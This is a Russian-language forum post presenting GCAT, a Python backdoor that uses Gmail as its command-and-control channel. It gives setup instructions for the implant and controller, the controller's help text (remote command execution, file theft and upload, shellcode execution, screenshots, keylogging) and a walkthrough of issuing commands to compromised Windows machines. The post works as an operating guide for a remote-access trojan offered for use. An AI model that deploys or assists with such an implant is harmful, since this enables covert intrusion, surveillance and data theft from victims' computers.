• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Soft Софт GCAT

gcat.jpg


GCAT
Скрытый бэкдор на основе Python, использующий Gmail в качестве сервера управления и контроля

Этот проект был вдохновлен оригинальным от Бенджамина Доннелли

Для более актуальной и поддерживаемой версии этого проекта см. GDog

Настроить
Для этого вам нужно:
  • Учетная запись Gmail ( используйте выделенную учетную запись! Не используйте свою учетную запись! )
  • Включите «Разрешить менее безопасные приложения» в настройках безопасности учетной записи.
  • Возможно, вам также придется включить IMAP в настройках учетной записи
Этот репо содержит два файла:
  • gcat.py скрипт, который используется для перечисления и выдачи команд доступным клиентам
  • implant.py фактический бэкдор для развертывания
В обоих файлах, редактировать gmail_userи gmail_pwdпеременные с именем пользователя и пароль учетной записи , ранее настройки.

Вы, вероятно, захотите скомпилировать implant.pyв исполняемый файл, используя Pyinstaller

Примечание. Рекомендуется скомпилировать implant.py с использованием 32-битной установки Python.

Применение
Код:
                                             dP   
                                             88   
                .d8888b. .d8888b. .d8888b. d8888P
                88'  `88 88'  `"" 88'  `88   88   
                88.  .88 88.  ... 88.  .88   88   
                `8888P88 `88888P' `88888P8   dP   
                     .88                         
                 d8888P 
                    

                   .__....._             _.....__,
                     .": o :':         ;': o :".
                     `. `-' .'.       .'. `-' .'   
                       `---'             `---' 

             _...----...      ...   ...      ...----..._
          .-'__..-''----    `.  `"`  .'    ----'''-..__`-.
         '.-'   _.--'''       `-._.-'       ''''--._   `-.`
         '  .-"'                  :                  `"-.  `
           '   `.              _.'"'._              .'   `
                 `.       ,.-'"       "'-.,       .'
                   `.                           .'
              jgs    `-._                   _.-'
                         `"'--...___...--'"`

                     ...IM IN YURR COMPUTERZ...

                        WATCHIN YURR SCREENZ

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -upload SRC DST       Upload a file to the clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Meow!
  • Развернув бэкдор на нескольких системах, вы можете проверить доступные клиенты с помощью команды list:
Код:
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

Вывод представляет собой строку UUID, которая однозначно идентифицирует систему и ОС, на которой работает имплантат

  • Давайте выдадим команду имплантату:
Код:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv


Здесь мы говорим 90b2cd83-cb36-52de-84ee-99db6ff41a11выполнить ipconfig /all, затем скрипт выводит то, jobidчто мы можем использовать для получения вывода этой команды
  • Получим результаты!
Код:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --

Вот и все! Но вы можете сделать гораздо больше, как вы можете увидеть из использования скрипта! ;)
 
  • Нравится
Реакции: Crazy Jack и Pulsera
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!